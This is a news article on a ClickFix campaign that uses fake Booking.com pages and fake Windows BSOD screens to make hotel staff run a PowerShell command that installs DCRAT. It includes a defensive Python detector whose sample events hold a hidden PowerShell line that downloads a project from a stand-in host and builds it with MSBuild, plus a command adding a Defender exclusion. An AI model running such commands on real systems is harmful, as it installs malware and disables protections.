ClickFix attack uses fake Windows BSOD screens to spread malware

06.01.2026 | 2 minutes | Author: Newsman

A new ClickFix social engineering campaign is targeting Europe’s hospitality sector, abusing fake Windows Blue Screen of Death (BSOD) pages to trick employees into manually executing malicious commands on their own systems.

According to Securonix researchers, the campaign tracked as PHALT#BLYX emerged in December 2025. The attack starts with phishing emails impersonating Booking.com cancellation notices that claim a significant refund amount, creating urgency for hotel staff.

Clicking the link leads victims to a high-fidelity clone of the Booking.com website, hosted on a third-party domain. The page accurately mimics the legitimate platform’s branding, colors, fonts, and layout. Embedded JavaScript initially displays a “loading is taking too long” error, then forces the browser into full-screen mode and renders a fake Windows BSOD.

Fake Booking.com reservation cancellation alert

Unlike a real BSOD, the fake screen provides step-by-step recovery instructions, prompting users to open the Windows Run dialog, paste a command from the clipboard, and execute it. This causes victims to run a malicious PowerShell command themselves, which downloads a .NET project, compiles it via the legitimate MSBuild.exe, and deploys malware.

  • The payload delivered in the campaign is DCRAT (DcRAT), a widely used remote access trojan. Once executed, it adds Windows Defender exclusions, attempts to gain administrative privileges via UAC prompts, downloads additional components through BITS, and establishes persistence via the Startup folder.

  • The malware is injected into the legitimate aspnet_compiler.exe process and runs entirely in memory. Upon connecting to its command-and-control server, it exfiltrates a full system fingerprint and awaits further instructions, supporting remote desktop access, keylogging, reverse shells, and additional payload deployment, including cryptominers.
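The execution chain described above (Run dialog launching PowerShell, PowerShell fetching and building a project with MSBuild.exe, MSBuild spawning aspnet_compiler.exe, and a Defender exclusion being added) gives defenders several process-lineage signals to alert on. The following is an added detection example written for this article, not code from Securonix or from the campaign; the event fields and the sample events are constructed and only mimic Sysmon-style process-creation telemetry.

```python
def _name(image):
    # Bare executable name, lower-cased, from a full Windows image path
    return image.rsplit("\\", 1)[-1].lower()

# Constructed sample process-creation events (assumed fields: pid, ppid, image, cmd).
# Not real telemetry; they model the chain described in the report plus one benign build.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 1200, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 5240, "ppid": 4100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -w hidden -c "iwr http://example.invalid/p.csproj -o p.csproj; msbuild.exe p.csproj"'},
    {"pid": 5300, "ppid": 5240, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmd": "MSBuild.exe p.csproj"},
    {"pid": 5350, "ppid": 5300, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe",
     "cmd": "aspnet_compiler.exe"},
    {"pid": 5400, "ppid": 5240, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Add-MpPreference -ExclusionPath C:\\Users\\Public"},
    # Benign: a developer running MSBuild directly from Explorer should not fire any rule
    {"pid": 6000, "ppid": 4100, "image": r"C:\Program Files\Microsoft Visual Studio\MSBuild\Current\Bin\MSBuild.exe",
     "cmd": "MSBuild.exe app.sln"},
]

DOWNLOAD_HINTS = ("iwr", "invoke-webrequest", "downloadstring", "curl")

def find_clickfix_chains(events):
    """Return (finding, pid) tuples for the ClickFix / MSBuild lineage patterns."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = _name(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = _name(parent["image"]) if parent else ""
        cmd = e["cmd"].lower()
        # 1. Run dialog (explorer.exe) launching PowerShell that downloads and hands off to MSBuild
        if name == "powershell.exe" and pname == "explorer.exe" and "msbuild" in cmd \
                and any(h in cmd for h in DOWNLOAD_HINTS):
            findings.append(("powershell_from_run_dialog_invoking_msbuild", e["pid"]))
        # 2. MSBuild.exe used as a compiler for a PowerShell-delivered project
        if name == "msbuild.exe" and pname == "powershell.exe":
            findings.append(("msbuild_child_of_powershell", e["pid"]))
        # 3. MSBuild spawning aspnet_compiler.exe, the injection host named in the report
        if name == "aspnet_compiler.exe" and pname == "msbuild.exe":
            findings.append(("aspnet_compiler_spawned_by_msbuild", e["pid"]))
        # 4. Windows Defender exclusion added from the command line
        if "add-mppreference" in cmd and "exclusion" in cmd:
            findings.append(("defender_exclusion_added", e["pid"]))
    return findings
```

Rules 2 and 3 rely on parent-child relationships only, so they still fire when the PowerShell command line is obfuscated; rule 4 is also worth pairing with Defender's own exclusion-change events where that log source is available.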

Fake error message on the Booking.com clone

This campaign highlights how social engineering continues to outperform technical exploits, especially in high-pressure business environments like hospitality. The use of fake BSOD screens marks a dangerous evolution of ClickFix tactics, enabling full system compromise without exploiting a single software vulnerability.
